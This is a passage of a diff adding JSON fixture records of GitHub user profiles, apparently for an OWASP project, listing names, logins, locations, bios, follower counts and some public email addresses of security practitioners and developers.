+}, +{ + "model": "github.user", + "pk": 452, + "fields": { + "nest_created_at": "2024-09-11T21:18:56.588Z", + "nest_updated_at": "2024-09-22T20:27:03.853Z", + "name": "Arkadii Yakovets", + "login": "arkid15r", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2201626?v=4", + "company": "", + "location": "WA, USA", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2012-08-23T05:29:26Z", + "updated_at": "2024-09-18T21:42:45Z", + "node_id": "MDQ6VXNlcjIyMDE2MjY=", + "bio": "Cybersecurity lead, l10n contributor, home automation enthusiast", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 453, + "fields": { + "nest_created_at": "2024-09-11T21:18:58.634Z", + "nest_updated_at": "2024-09-11T21:18:58.634Z", + "name": "Cristhian Antonio Ferreira Suazo", + "login": "cferreirasuazo", + "email": "cferreirasuazo@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26103584?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2017-03-01T03:29:40Z", + "updated_at": "2024-05-26T13:01:25Z", + "node_id": "MDQ6VXNlcjI2MTAzNTg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 454, + "fields": { + "nest_created_at": "2024-09-11T21:18:59.894Z", + "nest_updated_at": "2024-09-11T21:19:01.513Z", + "name": "", + "login": "ErtyDess", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118749390?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-11-21T14:47:06Z", + "updated_at": "2024-08-07T02:01:10Z", + "node_id": "U_kgDOBxP4zg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 455, + "fields": { + "nest_created_at": "2024-09-11T21:19:02.347Z", + "nest_updated_at": "2024-09-22T20:27:11.637Z", + "name": "Prabhat Kumar", + "login": "prbhtkumr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50882504?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 104, + "public_gists_count": 1, + "public_repositories_count": 50, + "created_at": "2019-05-21T17:02:45Z", + "updated_at": "2024-09-11T08:41:39Z", + "node_id": "MDQ6VXNlcjUwODgyNTA0", + "bio": "I'm a Student Developer and Cyber Security Enthusiast.", + "is_hireable": true, + "twitter_username": "prbhtkumr" + } +}, +{ + "model": "github.user", + "pk": 456, + "fields": { + "nest_created_at": "2024-09-11T21:19:03.976Z", + "nest_updated_at": "2024-09-11T21:19:03.976Z", + "name": "", + "login": "spacezero20", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46658915?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2019-01-13T23:01:01Z", + "updated_at": "2024-07-03T03:18:31Z", + "node_id": "MDQ6VXNlcjQ2NjU4OTE1", + "bio": "Let's collaborate!", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 457, + "fields": { + "nest_created_at": "2024-09-11T21:19:05.656Z", + "nest_updated_at": "2024-09-11T21:19:05.656Z", + "name": "Daniel Javanrad", + "login": "djpoker", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59816538?v=4", + "company": "", + "location": "IRAN", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-01-13T05:25:28Z", + "updated_at": "2024-08-24T10:41:19Z", + "node_id": "MDQ6VXNlcjU5ODE2NTM4", + "bio": "Penetration test", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 458, + "fields": { + "nest_created_at": "2024-09-11T21:19:07.714Z", + "nest_updated_at": "2024-09-11T21:19:07.714Z", + "name": "", + "login": "aliisawesome160", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/62612570?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-03-24T16:23:37Z", + "updated_at": "2024-05-05T05:36:21Z", + "node_id": "MDQ6VXNlcjYyNjEyNTcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 459, + "fields": { + "nest_created_at": "2024-09-11T21:19:09.849Z", + "nest_updated_at": "2024-09-13T16:59:02.641Z", + "name": "", + "login": "WestFarmer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14016562?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2015-08-28T13:40:56Z", + "updated_at": "2024-08-30T06:17:37Z", + "node_id": "MDQ6VXNlcjE0MDE2NTYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 460, + "fields": { + "nest_created_at": "2024-09-11T21:19:28.889Z", + "nest_updated_at": "2024-09-11T21:19:28.889Z", + "name": "kevingo", + "login": "kevingo", + "email": "kevingo75@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1113954?v=4", + "company": "@Mediatek-Cloud ", + "location": "Taiwan", + "collaborators_count": 0, + "following_count": 265, + "followers_count": 176, + "public_gists_count": 64, + "public_repositories_count": 132, + "created_at": "2011-10-09T11:50:55Z", + "updated_at": "2024-03-22T06:41:43Z", + "node_id": "MDQ6VXNlcjExMTM5NTQ=", + "bio": "Keep learning.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 461, + "fields": { + "nest_created_at": "2024-09-11T21:19:30.543Z", + "nest_updated_at": "2024-09-11T21:19:30.543Z", + "name": "wentx", + "login": "momaek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3843588?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 112, + "followers_count": 49, + "public_gists_count": 1, + "public_repositories_count": 113, + "created_at": "2013-03-12T14:40:24Z", + "updated_at": "2024-08-14T09:09:29Z", + "node_id": "MDQ6VXNlcjM4NDM1ODg=", + "bio": "Add a Bio", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 462, + "fields": { + "nest_created_at": "2024-09-11T21:19:31.808Z", + "nest_updated_at": "2024-09-11T21:19:31.808Z", + "name": "João Pena Gil", + "login": "Jack64", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11641285?v=4", + "company": "", + "location": "Porto, Portugal", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 28, + "public_gists_count": 1, + "public_repositories_count": 14, + "created_at": "2015-03-25T03:21:49Z", + "updated_at": "2024-08-10T11:36:56Z", + "node_id": "MDQ6VXNlcjExNjQxMjg1", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 463, + "fields": { + "nest_created_at": "2024-09-11T21:19:33.054Z", + "nest_updated_at": "2024-09-22T20:30:39.172Z", + "name": "Logyi, hajnalvédő", + "login": "lojikil", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/581001?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 242, + "followers_count": 295, + "public_gists_count": 15, + "public_repositories_count": 104, + "created_at": "2011-01-24T15:50:07Z", + "updated_at": "2024-07-14T11:04:17Z", + "node_id": "MDQ6VXNlcjU4MTAwMQ==", + "bio": "Former DIR of OffSec & former Unix Curmudgeon. Totally available for discussions of phantom types. Dad, PLT Philosopher, Tolstoy, Epictetus, Jun Tsuji, & Camus", + "is_hireable": false, + "twitter_username": "lojikil" + } +}, +{ + "model": "github.user", + "pk": 464, + "fields": { + "nest_created_at": "2024-09-11T21:19:38.188Z", + "nest_updated_at": "2024-09-11T21:19:38.188Z", + "name": "Michalis Papadopoullos", + "login": "xmpf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2173624?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 16, + "public_repositories_count": 90, + "created_at": "2012-08-18T06:14:27Z", + "updated_at": "2024-09-09T12:53:06Z", + "node_id": "MDQ6VXNlcjIxNzM2MjQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "megatr0nz" + } +}, +{ + "model": "github.user", + "pk": 465, + "fields": { + "nest_created_at": "2024-09-11T21:19:39.875Z", + "nest_updated_at": "2024-09-11T21:19:41.532Z", + "name": "GS McNamara", + "login": "gsmcnamara-okta", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83419119?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-04-29T16:21:11Z", + "updated_at": "2022-08-01T17:30:17Z", + "node_id": "MDQ6VXNlcjgzNDE5MTE5", + "bio": "Senior Application Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 466, + "fields": { + "nest_created_at": "2024-09-11T21:19:42.392Z", + "nest_updated_at": "2024-09-11T21:19:42.392Z", + "name": "Jory Geerts", + "login": "jorygeerts", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/871427?v=4", + "company": "CM.com", + "location": "Rijen, Nederland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 24, + "created_at": "2011-06-23T17:57:46Z", + "updated_at": "2024-04-10T09:20:45Z", + "node_id": "MDQ6VXNlcjg3MTQyNw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 467, + "fields": { + "nest_created_at": "2024-09-11T21:19:43.223Z", + "nest_updated_at": "2024-09-11T21:19:43.223Z", + "name": "", + "login": "JonEngle", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5994192?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2013-11-20T19:20:17Z", + "updated_at": "2023-11-16T22:42:25Z", + "node_id": "MDQ6VXNlcjU5OTQxOTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 468, + "fields": { + "nest_created_at": "2024-09-11T21:19:49.415Z", + "nest_updated_at": "2024-09-22T18:21:51.487Z", + "name": "Evin Hernandez", + "login": "evinhernandez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6225137?v=4", + "company": "VMware", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2013-12-19T18:36:00Z", + "updated_at": "2023-05-25T16:46:38Z", + "node_id": "MDQ6VXNlcjYyMjUxMzc=", + "bio": "stoic security researcher, malware killer, compliance applier,owasp chapter leader / VP, love tattoos, motorcycles & books.All round geek / martial artist", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 469, + "fields": { + "nest_created_at": "2024-09-11T21:20:10.981Z", + "nest_updated_at": "2024-09-22T19:31:11.480Z", + "name": "Sven", + "login": "sushi2k", + "email": "sven.schleier@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/5951320?v=4", + "company": "", + "location": "Austria", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 118, + "public_gists_count": 2, + "public_repositories_count": 51, + "created_at": "2013-11-15T21:00:46Z", + "updated_at": "2024-09-15T03:24:03Z", + "node_id": "MDQ6VXNlcjU5NTEzMjA=", + "bio": "Project Leader of @OWASP Mobile App Security (MAS), MASTG and MASVS 📘📲", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 470, + "fields": { + "nest_created_at": "2024-09-11T21:20:16.858Z", + "nest_updated_at": "2024-09-22T19:30:12.526Z", + "name": "Sijo Abraham", + "login": "51j0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45711988?v=4", + "company": "Ernst & Young", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2018-12-08T11:43:22Z", + "updated_at": "2023-09-16T17:02:18Z", + "node_id": "MDQ6VXNlcjQ1NzExOTg4", + "bio": "Dedicated in continuously developing, implementing, and adopting new technologies to maximize Development Security and Operation efficiency.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 471, + "fields": { + "nest_created_at": "2024-09-11T21:20:24.903Z", + "nest_updated_at": "2024-09-11T21:20:24.903Z", + "name": "Autumn", + "login": "shwetajoshi26", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41187810?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-07-13T09:23:05Z", + "updated_at": "2019-12-19T10:51:24Z", + "node_id": "MDQ6VXNlcjQxMTg3ODEw", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 472, + "fields": { + "nest_created_at": "2024-09-11T21:20:31.502Z", + "nest_updated_at": "2024-09-11T21:21:21.198Z", + "name": "", + "login": "galapogos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/661378?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2011-03-10T06:28:23Z", + "updated_at": "2023-11-23T09:47:02Z", + "node_id": "MDQ6VXNlcjY2MTM3OA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 473, + "fields": { + "nest_created_at": "2024-09-11T21:20:35.340Z", + "nest_updated_at": "2024-09-22T19:29:55.756Z", + "name": "", + "login": "0x10f2c", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66067434?v=4", + "company": "", + "location": "Australia", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2020-05-28T11:15:11Z", + "updated_at": "2024-09-11T06:28:03Z", + "node_id": "MDQ6VXNlcjY2MDY3NDM0", + "bio": "Infosec mobile stuff", + "is_hireable": false, + "twitter_username": "0x10F2C_" + } +}, +{ + "model": "github.user", + "pk": 474, + "fields": { + "nest_created_at": "2024-09-11T21:20:42.089Z", + "nest_updated_at": "2024-09-22T19:49:34.333Z", + "name": "Carlos Holguera", + "login": "cpholguera", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29175115?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 122, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2017-06-04T11:05:47Z", + "updated_at": "2024-09-21T22:39:03Z", + "node_id": "MDQ6VXNlcjI5MTc1MTE1", + "bio": "Project Leader of @OWASP Mobile App Security (MAS), MASTG and MASVS 📘📲", + "is_hireable": false, + "twitter_username": "grepharder" + } +}, +{ + "model": "github.user", + "pk": 475, + "fields": { + "nest_created_at": "2024-09-11T21:20:43.350Z", + "nest_updated_at": "2024-09-22T19:30:13.818Z", + "name": "", + "login": "meetinthemiddle-be", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26706067?v=4", + "company": "Meet in the Middle", + "location": "Leuven, Vlaams Brabant", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-03-27T07:30:24Z", + "updated_at": "2024-08-15T16:17:07Z", + "node_id": "MDQ6VXNlcjI2NzA2MDY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 476, + "fields": { + "nest_created_at": "2024-09-11T21:20:43.778Z", + "nest_updated_at": "2024-09-22T19:29:54.497Z", + "name": "Vikas Gupta", + "login": "su-vikas", + "email": "vikig@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8759677?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 78, + "public_gists_count": 2, + "public_repositories_count": 24, + "created_at": "2014-09-13T12:37:43Z", + "updated_at": "2024-06-08T06:38:21Z", + "node_id": "MDQ6VXNlcjg3NTk2Nzc=", + "bio": "Security researcher, Reverse Engineering, Obfuscation", + "is_hireable": false, + "twitter_username": "rockinvikas" + } +}, +{ + "model": "github.user", + "pk": 477, + "fields": { + "nest_created_at": "2024-09-11T21:20:45.069Z", + "nest_updated_at": "2024-09-22T20:25:36.282Z", + "name": "Jeroen Beckers", + "login": "TheDauntless", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1650034?v=4", + "company": "@NVISOsecurity ", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 100, + "public_gists_count": 2, + "public_repositories_count": 10, + "created_at": "2012-04-16T23:27:03Z", + "updated_at": "2024-09-19T08:21:17Z", + "node_id": "MDQ6VXNlcjE2NTAwMzQ=", + "bio": "Mobile Security Expert at @NVISOsecurity", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 478, + "fields": { + "nest_created_at": "2024-09-11T21:20:46.337Z", + "nest_updated_at": "2024-09-11T21:20:46.337Z", + "name": "Andy Murray", + "login": "toorka", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15941900?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-11-20T11:53:20Z", + "updated_at": "2024-09-06T16:40:19Z", + "node_id": "MDQ6VXNlcjE1OTQxOTAw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 479, + "fields": { + "nest_created_at": "2024-09-11T21:21:16.571Z", + "nest_updated_at": "2024-09-11T21:21:16.571Z", + "name": "", + "login": "chq-matteo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6654800?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 32, + "public_gists_count": 2, + "public_repositories_count": 50, + "created_at": "2014-02-11T21:06:21Z", + "updated_at": "2024-04-03T07:36:04Z", + "node_id": "MDQ6VXNlcjY2NTQ4MDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 480, + "fields": { + "nest_created_at": "2024-09-11T21:21:17.838Z", + "nest_updated_at": "2024-09-22T19:30:52.087Z", + "name": "", + "login": "DemanNL", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40244668?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-06-13T17:10:20Z", + "updated_at": "2024-09-02T12:56:56Z", + "node_id": "MDQ6VXNlcjQwMjQ0NjY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 481, + "fields": { + "nest_created_at": "2024-09-11T21:21:19.550Z", + "nest_updated_at": "2024-09-22T19:31:22.465Z", + "name": "v13rsba", + "login": "lwierzbicki", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1812393?v=4", + "company": "", + "location": "Czech Republic", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 25, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2012-06-03T14:57:12Z", + "updated_at": "2024-09-03T11:23:46Z", + "node_id": "MDQ6VXNlcjE4MTIzOTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 482, + "fields": { + "nest_created_at": "2024-09-11T21:21:26.283Z", + "nest_updated_at": "2024-09-22T20:24:36.395Z", + "name": "Henry Hu", + "login": "ninedter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19329382?v=4", + "company": "Auriga Security, Inc.", + "location": "Taipei, Taiwan", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2016-05-12T14:50:14Z", + "updated_at": "2022-10-26T13:46:34Z", + "node_id": "MDQ6VXNlcjE5MzI5Mzgy", + "bio": "Chapter Leader / OWASP Taiwan Chapter", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 483, + "fields": { + "nest_created_at": "2024-09-11T21:21:26.670Z", + "nest_updated_at": "2024-09-11T21:21:26.670Z", + "name": "Jigar Brahmbhatt", + "login": "findjigar", + "email": "work@jigarbrahmbhatt.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2466073?v=4", + "company": "@touchlab ", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 23, + "public_gists_count": 4, + "public_repositories_count": 9, + "created_at": "2012-10-01T18:50:54Z", + "updated_at": "2024-09-11T00:17:25Z", + "node_id": "MDQ6VXNlcjI0NjYwNzM=", + "bio": "Kotlin Multiplatform | Android", + "is_hireable": false, + "twitter_username": "shaktiman_droid" + } +}, +{ + "model": "github.user", + "pk": 484, + "fields": { + "nest_created_at": "2024-09-11T21:21:32.073Z", + "nest_updated_at": "2024-09-22T19:45:50.216Z", + "name": "Phu Nguyen (Tony)", + "login": "crazykid95", + "email": "phu.nguyen@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/49476207?v=4", + "company": "@tarantula-team ", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 24, + "public_gists_count": 1, + "public_repositories_count": 89, + "created_at": "2019-04-10T08:43:03Z", + "updated_at": "2024-09-04T16:33:09Z", + "node_id": "MDQ6VXNlcjQ5NDc2MjA3", + "bio": "Red team Lead", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 485, + "fields": { + "nest_created_at": "2024-09-11T21:21:33.355Z", + "nest_updated_at": "2024-09-11T21:21:33.355Z", + "name": "Jeroen Leenarts", + "login": "jeroenleenarts", + "email": "jeroen.leenarts@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/39677?v=4", + "company": "AppForce1, CocoaHeadsNL & Stream", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 83, + "public_gists_count": 2, + "public_repositories_count": 26, + "created_at": "2008-12-11T00:01:48Z", + "updated_at": "2024-04-18T13:01:46Z", + "node_id": "MDQ6VXNlcjM5Njc3", + "bio": "", + "is_hireable": true, + "twitter_username": "appforce1" + } +}, +{ + "model": "github.user", + "pk": 486, + "fields": { + "nest_created_at": "2024-09-11T21:21:33.735Z", + "nest_updated_at": "2024-09-22T20:23:17.438Z", + "name": "Luke", + "login": "bigshebang", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3886683?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 17, + "public_gists_count": 3, + "public_repositories_count": 19, + "created_at": "2013-03-16T23:21:36Z", + "updated_at": "2022-10-18T17:08:02Z", + "node_id": "MDQ6VXNlcjM4ODY2ODM=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 487, + "fields": { + "nest_created_at": "2024-09-11T21:21:44.834Z", + "nest_updated_at": "2024-09-22T19:45:44.756Z", + "name": "Kousha Zanjani", + "login": "kousha1999", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36133745?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 45, + "public_gists_count": 4, + "public_repositories_count": 19, + "created_at": "2018-02-04T16:16:13Z", + "updated_at": "2024-09-13T17:04:36Z", + "node_id": "MDQ6VXNlcjM2MTMzNzQ1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 488, + "fields": { + "nest_created_at": "2024-09-11T21:21:47.766Z", + "nest_updated_at": "2024-09-11T21:21:47.766Z", + "name": "", + "login": "gl4nce", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/80954719?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-03-19T10:18:04Z", + "updated_at": "2023-09-09T12:14:15Z", + "node_id": "MDQ6VXNlcjgwOTU0NzE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 489, + "fields": { + "nest_created_at": "2024-09-11T21:21:52.363Z", + "nest_updated_at": "2024-09-11T21:21:52.363Z", + "name": "Darvin", + "login": "darvincisec", + "email": "darvincitech@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/57146337?v=4", + "company": "", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 92, + "followers_count": 323, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2019-10-29T15:36:50Z", + "updated_at": "2024-09-10T13:52:18Z", + "node_id": "MDQ6VXNlcjU3MTQ2MzM3", + "bio": "Security Researcher\r\n", + "is_hireable": false, + "twitter_username": "darvincisec" + } +}, +{ + "model": "github.user", + "pk": 490, + "fields": { + "nest_created_at": "2024-09-11T21:21:59.301Z", + "nest_updated_at": "2024-09-11T21:21:59.681Z", + "name": "Imdad", + "login": "imdadvs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7274724?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-04-12T17:53:24Z", + "updated_at": "2024-06-04T06:19:43Z", + "node_id": "MDQ6VXNlcjcyNzQ3MjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 491, + "fields": { + "nest_created_at": "2024-09-11T21:22:20.002Z", + "nest_updated_at": "2024-09-22T19:31:04.242Z", + "name": "LukasMarckmiller ", + "login": "LukasMarckmiller", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18208274?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2016-04-01T07:56:44Z", + "updated_at": "2024-08-29T06:11:25Z", + "node_id": "MDQ6VXNlcjE4MjA4Mjc0", + "bio": "Pentester.\r\nTesting Pens.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 492, + "fields": { + "nest_created_at": "2024-09-11T21:22:28.636Z", + "nest_updated_at": "2024-09-11T21:22:28.636Z", + "name": "Aaron Bishop", + "login": "irbishop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/161021?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2009-12-02T19:11:17Z", + "updated_at": "2024-07-28T17:07:43Z", + "node_id": "MDQ6VXNlcjE2MTAyMQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 493, + "fields": { + "nest_created_at": "2024-09-11T21:22:30.299Z", + "nest_updated_at": "2024-09-22T19:30:55.582Z", + "name": "Amod Deshpande", + "login": "Amod02-prog", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83520862?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2021-05-01T23:33:46Z", + "updated_at": "2024-08-01T04:57:20Z", + "node_id": "MDQ6VXNlcjgzNTIwODYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 494, + "fields": { + "nest_created_at": "2024-09-11T21:22:32.465Z", + "nest_updated_at": "2024-09-22T19:44:49.295Z", + "name": "swapnil shinde", + "login": "AtmegaBuzz", + "email": "swapnilshinde9382@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/68425016?v=4", + "company": "", + "location": "mars", + "collaborators_count": 0, + "following_count": 101, + "followers_count": 201, + "public_gists_count": 0, + "public_repositories_count": 110, + "created_at": "2020-07-17T10:34:53Z", + "updated_at": "2024-09-19T11:05:16Z", + "node_id": "MDQ6VXNlcjY4NDI1MDE2", + "bio": "", + "is_hireable": true, + "twitter_username": "a_kraken_head" + } +}, +{ + "model": "github.user", + "pk": 495, + "fields": { + "nest_created_at": "2024-09-11T21:22:36.596Z", + "nest_updated_at": "2024-09-11T21:22:36.596Z", + "name": "", + "login": "vadimszzz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92526019?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 228, + "followers_count": 227, + "public_gists_count": 11, + "public_repositories_count": 0, + "created_at": "2021-10-14T12:38:19Z", + "updated_at": "2024-08-06T18:24:31Z", + "node_id": "U_kgDOBYPVww", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 496, + "fields": { + "nest_created_at": "2024-09-11T21:22:46.669Z", + "nest_updated_at": "2024-09-22T19:30:25.087Z", + "name": "Marko Lihter", + "login": "lihter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82365531?v=4", + "company": "SplxAI", + "location": "Zagreb, Croatia", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + 